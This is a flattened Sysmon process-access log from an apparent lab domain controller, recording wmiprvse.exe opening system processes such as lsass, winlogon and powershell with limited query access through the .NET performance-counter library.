13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 